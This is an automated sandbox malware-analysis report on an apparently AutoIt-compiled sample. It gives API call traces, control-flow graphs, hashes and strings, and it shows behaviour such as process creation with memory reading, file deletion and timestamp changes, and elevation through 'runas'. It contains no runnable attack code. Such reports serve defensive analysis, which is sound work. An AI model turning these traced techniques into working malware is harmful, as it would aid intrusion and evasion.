                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 312f352b4a4458247585fd0df3bc676af07877cd72d6a634ce8fd10066ba1855
                                                • Instruction ID: 15de3f0b496549d5ed1f5f984a223712a60bb5009ebfae336f35a14979ca5e45
                                                • Opcode Fuzzy Hash: 312f352b4a4458247585fd0df3bc676af07877cd72d6a634ce8fd10066ba1855
                                                • Instruction Fuzzy Hash: C5C1E479E0426A9FDB519FACC880BEDBFF0AF09314F044089F995A7282C7399941CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 607 1926d0-19277e call 190000 610 192785-1927ab call 1935e0 CreateFileW 607->610 613 1927ad 610->613 614 1927b2-1927c2 610->614 615 1928fd-192901 613->615 619 1927c9-1927e3 VirtualAlloc 614->619 620 1927c4 614->620 616 192943-192946 615->616 617 192903-192907 615->617 621 192949-192950 616->621 622 192909-19290c 617->622 623 192913-192917 617->623 624 1927ea-192801 ReadFile 619->624 625 1927e5 619->625 620->615 626 192952-19295d 621->626 627 1929a5-1929ba 621->627 622->623 628 192919-192923 623->628 629 192927-19292b 623->629 632 192808-192848 VirtualAlloc 624->632 633 192803 624->633 625->615 634 19295f 626->634 635 192961-19296d 626->635 636 1929ca-1929d2 627->636 637 1929bc-1929c7 VirtualFree 627->637 628->629 630 19293b 629->630 631 19292d-192937 629->631 630->616 631->630 638 19284a 632->638 639 19284f-19286a call 193830 632->639 633->615 634->627 640 19296f-19297f 635->640 641 192981-19298d 635->641 637->636 638->615 647 192875-19287f 639->647 643 1929a3 640->643 644 19299a-1929a0 641->644 645 19298f-192998 641->645 643->621 644->643 645->643 648 192881-1928b0 call 193830 647->648 649 1928b2-1928c6 call 193640 647->649 648->647 654 1928c8 649->654 655 1928ca-1928ce 649->655 654->615 657 1928da-1928de 655->657 658 1928d0-1928d4 CloseHandle 655->658 659 1928ee-1928f7 657->659 660 1928e0-1928eb VirtualFree 657->660 658->657 659->610 659->615 660->659
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 001927A1
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001929C7
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_190000_name.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: 63155b228cbd790225c4dff862d46be7a4e35b2cb375373675a080d0078fc005
                                                • Instruction ID: 5cf1e58f1598886dba6b4de8336c79f3c62c72a6ac28d878da87083de2f7da3f
                                                • Opcode Fuzzy Hash: 63155b228cbd790225c4dff862d46be7a4e35b2cb375373675a080d0078fc005
                                                • Instruction Fuzzy Hash: 74A11670E00219EBDF14CFA4C894BEEBBB5FF48704F208159E601BB280D7759A81DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 661 ff42a2-ff42ba CreateStreamOnHGlobal 662 ff42bc-ff42d3 FindResourceExW 661->662 663 ff42da-ff42dd 661->663 664 ff42d9 662->664 665 10335ba-10335c9 LoadResource 662->665 664->663 665->664 666 10335cf-10335dd SizeofResource 665->666 666->664 667 10335e3-10335ee LockResource 666->667 667->664 668 10335f4-1033612 667->668 668->664
                                                APIs
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00FF42B2
                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FF50AA,?,?,00000000,00000000), ref: 00FF42C9
                                                • LoadResource.KERNEL32(?,00000000,?,?,00FF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FF4F20), ref: 010335BE
                                                • SizeofResource.KERNEL32(?,00000000,?,?,00FF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FF4F20), ref: 010335D3
                                                • LockResource.KERNEL32(00FF50AA,?,?,00FF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FF4F20,?), ref: 010335E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT
                                                • API String ID: 3051347437-3967369404
                                                • Opcode ID: 234dad8e7097f178981a5c3dbe43bfcacb18921baf8e9ea9572d6112e55c29fe
                                                • Instruction ID: 75891ef3754d0c22d6a145c7443043d541dffd3f3fe7db891a5b1d2ceb72606c
                                                • Opcode Fuzzy Hash: 234dad8e7097f178981a5c3dbe43bfcacb18921baf8e9ea9572d6112e55c29fe
                                                • Instruction Fuzzy Hash: 55117C71204704BFE7218B65DD48F6B7BB9EFC5B61F104169B586966A0EB72E8009630
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 671 ff2c63-ff2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: 9dfafd330d0800a17ca11ab20c5a908f9bffbc358f82da882829a0078757e14a
                                                • Instruction ID: 8309e7647cfd1e4d7a8d35afdc1b4f8f842cb8441c27b6864475aaeacf13437c
                                                • Opcode Fuzzy Hash: 9dfafd330d0800a17ca11ab20c5a908f9bffbc358f82da882829a0078757e14a
                                                • Instruction Fuzzy Hash: C0F0B775544290BEFB311717AC08EB73EBDE7C6F54B01805AF980A6595C67A1850DFB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 672 190b40-190f17 SHGetFolderPathW 673 190f19-190f1b 672->673 674 190f20-190f66 call 1908b0 672->674 675 191056-19105a 673->675 680 190f68-190f6a 674->680 681 190f6f-190f95 CreateFileW 674->681 680->675 682 190f9e-190fc3 call 193540 VirtualAlloc 681->682 683 190f97-190f99 681->683 686 190fcc-191015 call 193540 WriteFile 682->686 687 190fc5-190fc7 682->687 683->675 693 191017-191034 686->693 694 191036-191051 CloseHandle VirtualFree 686->694 687->675 693->675 694->675
                                                APIs
                                                • SHGetFolderPathW.SHELL32(00000000,00000007,00000000,00000000,?), ref: 00190F12
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_190000_name.jbxd
                                                Similarity
                                                • API ID: FolderPath
                                                • String ID:
                                                • API String ID: 1514166925-0
                                                • Opcode ID: 95ddebdc80c0388c7879413c4e0cde7b78d1c6233938bd38565f64de7610077d
                                                • Instruction ID: 554a10d70f08fc687ace8dd6280619e85745ba1267e63d6c095c27de52ef6326
                                                • Opcode Fuzzy Hash: 95ddebdc80c0388c7879413c4e0cde7b78d1c6233938bd38565f64de7610077d
                                                • Instruction Fuzzy Hash: E8D10114A24648D7EB24DFB4D854BDEB232EF68700F10A569E10DEB3D0E77A4E41CB5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 697 10261fe-1026217 698 1026219-1026229 call 102fe21 697->698 699 102622d-1026232 697->699 698->699 709 102622b 698->709 701 1026234-102623c 699->701 702 102623f-1026263 MultiByteToWideChar 699->702 701->702 703 10263f6-1026409 call 1010a8c 702->703 704 1026269-1026275 702->704 706 1026277-1026288 704->706 707 10262c9 704->707 710 10262a7-10262b8 call 1023820 706->710 711 102628a-1026299 call 1032040 706->711 713 10262cb-10262cd 707->713 709->699 717 10263eb 710->717 724 10262be 710->724 711->717 723 102629f-10262a5 711->723 716 10262d3-10262e6 MultiByteToWideChar 713->716 713->717 716->717 720 10262ec-10262fe call 1023467 716->720 721 10263ed-10263f4 call 1021537 717->721 726 1026303-1026307 720->726 721->703 728 10262c4-10262c7 723->728 724->728 726->717 729 102630d-1026314 726->729 728->713 730 1026316-102631b 729->730 731 102634e-102635a 729->731 730->721 732 1026321-1026323 730->732 733 10263a6 731->733 734 102635c-102636d 731->734 732->717 735 1026329-1026343 call 1023467 732->735 736 10263a8-10263aa 733->736 737 1026388-1026399 call 1023820 734->737 738 102636f-102637e call 1032040 734->738 735->721 750 1026349 735->750 740 10263e4-10263ea call 1021537 736->740 741 10263ac-10263c5 call 1023467 736->741 737->740 749 102639b 737->749 738->740 753 1026380-1026386 738->753 740->717 741->740 755 10263c7-10263ce 741->755 754 10263a1-10263a4 749->754 750->717 753->754 754->736 756 10263d0-10263d1 755->756 757 102640a-1026410 755->757 758 10263d2-10263e2 WideCharToMultiByte 756->758 757->758 758->740 759 1026412-1026419 call 1021537 758->759 759->721
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,010182D9,010182D9,?,?,?,0102644F,00000001,00000001,8BE85006), ref: 01026258
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0102644F,00000001,00000001,8BE85006,?,?,?), ref: 010262DE
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 010263D8
                                                • __freea.LIBCMT ref: 010263E5
                                                  • Part of subcall function 01023820: RtlAllocateHeap.NTDLL(00000000,?,010C1444,?,0100FDF5,?,?,00FFA976,00000010,010C1440,00FF13FC,?,00FF13C6,?,00FF1129), ref: 01023852
                                                • __freea.LIBCMT ref: 010263EE
                                                • __freea.LIBCMT ref: 01026413
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: 86fbce7dfba021d21be3cd7abf1bd0ef41d54d195556b56f560a9274cf1d52c3
                                                • Instruction ID: 60815a981e7f3c8b8bfea0dc79dbcde61fda91dd8cce85ac1a6d9b564780c1da
                                                • Opcode Fuzzy Hash: 86fbce7dfba021d21be3cd7abf1bd0ef41d54d195556b56f560a9274cf1d52c3
                                                • Instruction Fuzzy Hash: 8051D472600226ABEF258F68CC80EEF7BE9EF45650F1586A9FD85D7140DB36DC44C660
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 876 192410-1925ad call 190000 call 192300 CreateFileW 883 1925af 876->883 884 1925b4-1925c7 876->884 885 192687-19268c 883->885 887 1925c9 884->887 888 1925ce-1925e8 VirtualAlloc 884->888 887->885 889 1925ea 888->889 890 1925ef-192609 ReadFile 888->890 889->885 891 19260b 890->891 892 19260d-192661 call 1910d0 call 192340 call 191300 890->892 891->885 899 19267d-192685 ExitProcess 892->899 900 192663-192678 call 192390 892->900 899->885 900->899
                                                APIs
                                                  • Part of subcall function 00192300: Sleep.KERNELBASE(000001F4), ref: 00192311
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001925A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_190000_name.jbxd
                                                Similarity
                                                • API ID: CreateFileSleep
                                                • String ID: D2J5TF0I3O7D4RJK98328JOBFD57
                                                • API String ID: 2694422964-1570901577
                                                • Opcode ID: 44351ae6fdbc2488f781d41fe5d50ebbaa8f83fadaeda6be5a636a4d7e68d2ec
                                                • Instruction ID: c9da54c1e0acbe6d115990c0129a7e03e7ac2811c72d8cfad16ec33d55b25f0d
                                                • Opcode Fuzzy Hash: 44351ae6fdbc2488f781d41fe5d50ebbaa8f83fadaeda6be5a636a4d7e68d2ec
                                                • Instruction Fuzzy Hash: AB71B470D14288EBEF11DBB4C8547EEBB75AF19300F044199E648BB2C1D7BA1B49CB66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 902 1062947-10629b9 call 1031f50 call 10625d6 call 100fe0b call ff5722 call 106274e call ff511f call 1015232 917 10629bf-10629c6 call 1062e66 902->917 918 1062a6c-1062a73 call 1062e66 902->918 923 1062a75-1062a77 917->923 924 10629cc-1062a6a call 101d583 call 1014983 call 1019038 call 101d583 call 1019038 * 2 917->924 918->923 925 1062a7c 918->925 926 1062cb6-1062cb7 923->926 928 1062a7f-1062b3a call ff50f5 * 8 call 1063017 call 101e5eb 924->928 925->928 929 1062cd5-1062cdb 926->929 967 1062b43-1062b5e call 1062792 928->967 968 1062b3c-1062b3e 928->968 932 1062cf0-1062cf6 929->932 933 1062cdd-1062ce8 call 100fdcd call 100fe14 929->933 946 1062ced 933->946 946->932 971 1062b64-1062b6c 967->971 972 1062bf0-1062bfc call 101e678 967->972 968->926 973 1062b74 971->973 974 1062b6e-1062b72 971->974 979 1062c12-1062c16 972->979 980 1062bfe-1062c0d DeleteFileW 972->980 976 1062b79-1062b97 call ff50f5 973->976 974->976 986 1062bc1-1062bd7 call 106211d call 101dbb3 976->986 987 1062b99-1062b9e 976->987 982 1062c91-1062ca5 CopyFileW 979->982 983 1062c18-1062c7e call 10625d6 call 101d2eb * 2 call 10622ce 979->983 980->926 984 1062ca7-1062cb4 DeleteFileW 982->984 985 1062cb9-1062ccf DeleteFileW call 1062fd8 982->985 983->985 1007 1062c80-1062c8f DeleteFileW 983->1007 984->926 994 1062cd4 985->994 1000 1062bdc-1062be7 986->1000 990 1062ba1-1062bb4 call 10628d2 987->990 1001 1062bb6-1062bbf 990->1001 994->929 1000->971 1003 1062bed 1000->1003 1001->986 1003->972 1007->926
                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01062C05
                                                • DeleteFileW.KERNEL32(?), ref: 01062C87
                                                • CopyFileW.KERNEL32 ref: 01062C9D
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01062CAE
                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01062CC0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: File$Delete$Copy
                                                • String ID:
                                                • API String ID: 3226157194-0
                                                • Opcode ID: 6ec771e102f284a73442d12efd975752fa9ba9807a5427cacca5e537074673d0
                                                • Instruction ID: 8d7f3752614a40a01b36455f7ddd8d1ba70163a10af003c5af4a5264f0f8aef6
                                                • Opcode Fuzzy Hash: 6ec771e102f284a73442d12efd975752fa9ba9807a5427cacca5e537074673d0
                                                • Instruction Fuzzy Hash: 46B16D72D0011EABDF21DBA4CC85EEEBBBDEF59350F0040A6F649E6154EB349A448F61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00FF2B6B
                                                  • Part of subcall function 00FF3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010C1418,?,00FF2E7F,?,?,?,00000000), ref: 00FF3A78
                                                  • Part of subcall function 00FF9CB3: _wcslen.LIBCMT ref: 00FF9CBD
                                                • GetForegroundWindow.USER32 ref: 01032C10
                                                • ShellExecuteW.SHELL32(00000000,?,?,010B2224), ref: 01032C17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                • String ID: runas
                                                • API String ID: 448630720-4000483414
                                                • Opcode ID: a3d878e66cecac0f214bfd70bae12333e23c693d9e68cbb68e7194c89af74ea6
                                                • Instruction ID: 91347b7156aab8513499c877bc18efe64b7aaab87cb8db6cf93194da56cf4cf5
                                                • Opcode Fuzzy Hash: a3d878e66cecac0f214bfd70bae12333e23c693d9e68cbb68e7194c89af74ea6
                                                • Instruction Fuzzy Hash: DE119D31608209AAD615FF60DC82ABEBBA4AF95750F44141DF7C2560B3CF798A4AA712
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000), ref: 00191B2D
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00191B73
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_190000_name.jbxd
                                                Similarity
                                                • API ID: Process$CreateMemoryRead
                                                • String ID:
                                                • API String ID: 2726527582-0
                                                • Opcode ID: f8f7afbd3a60ef6daf561255ccec5b0109585a1d8299ed3ea22ca16d56453c9c
                                                • Instruction ID: 4165e28a781b9d95d5429c871f6e9b2a0aa4c4017886ab533772aac4ba49b3a0
                                                • Opcode Fuzzy Hash: f8f7afbd3a60ef6daf561255ccec5b0109585a1d8299ed3ea22ca16d56453c9c
                                                • Instruction Fuzzy Hash: 37620930A14259DBEB24CFA4C851BDEB372EF58300F1091A9E50DEB394E7769E81CB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FF1BF4
                                                  • Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FF1BFC
                                                  • Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FF1C07
                                                  • Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FF1C12
                                                  • Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FF1C1A
                                                  • Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF1C22
                                                  • Part of subcall function 00FF1B4A: RegisterWindowMessageW.USER32(00000004,?,00FF12C4), ref: 00FF1BA2
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FF136A
                                                • OleInitialize.OLE32 ref: 00FF1388
                                                • CloseHandle.KERNEL32(00000000), ref: 010324AB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID:
                                                • API String ID: 1986988660-0
                                                • Opcode ID: d8edcbdf86877244d3f02681d622d0f4ec8bf38c3604344ce543f0c1ebd677b2
                                                • Instruction ID: 3e669fab1e0d4f26b7567152fab352342d68921409c2ff19d9094ba11008e7b3
                                                • Opcode Fuzzy Hash: d8edcbdf86877244d3f02681d622d0f4ec8bf38c3604344ce543f0c1ebd677b2
                                                • Instruction Fuzzy Hash: C171CFB4905204CFD3A4EF79E5446A97AF0BB68340358826EE1CAC735BEB3E8405DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CloseHandle.KERNELBASE(00000000), ref: 01028704
                                                • GetLastError.KERNEL32(?,010285CC,?,010B8CC8,0000000C), ref: 0102870E
                                                • __dosmaperr.LIBCMT ref: 01028739
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                • String ID:
                                                • API String ID: 2583163307-0
                                                • Opcode ID: 1319ca76295e1ee68b1befaa112cf367d68c129dbdc25827c1b3725d97b8f3c0
                                                • Instruction ID: 5bcf7d9dee0f059cc4dc634768d1a1da7afc67780f2be9addfc16e87e651d8d0
                                                • Opcode Fuzzy Hash: 1319ca76295e1ee68b1befaa112cf367d68c129dbdc25827c1b3725d97b8f3c0
                                                • Instruction Fuzzy Hash: 7201B63B60413126E2B16238A84CBFE2BD54B95734F24C19BE9D49B1C3DEB5C481C254
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 01062FF2
                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01062CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01063006
                                                • CloseHandle.KERNEL32(00000000), ref: 0106300D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                • API String ID: 3397143404-0
                                                • Opcode ID: c00a68094061ea70566d70d65ee2d46edbc417923e8e85b231fb876ca596fce7
                                                • Instruction ID: 6248eb948045880b77545c0bf0483f488183bf47f10242d6394f968e8f601e61
                                                • Opcode Fuzzy Hash: c00a68094061ea70566d70d65ee2d46edbc417923e8e85b231fb876ca596fce7
                                                • Instruction Fuzzy Hash: 79E0863228421077F6301659BD4DFCF3E6CD78AB71F104214F7D9790C086A5150153B8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _wcslen.LIBCMT ref: 01066F6B
                                                  • Part of subcall function 00FF4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4EFD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: LibraryLoad_wcslen
                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                • API String ID: 3312870042-2806939583
                                                • Opcode ID: 5ef62309ff7d53eeec3c0c6c6182a789a2990b50e44cdd41330051c0262b500c
                                                • Instruction ID: 079058cc98ec7105bc6f470e4155c4aae5f0fddd4151cfeb825c4b13e03d3f59
                                                • Opcode Fuzzy Hash: 5ef62309ff7d53eeec3c0c6c6182a789a2990b50e44cdd41330051c0262b500c
                                                • Instruction Fuzzy Hash: B9B1A1311082058FDB14EF24C8919BFB7E5AF94304F44886DF696872A2EF74ED49DB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
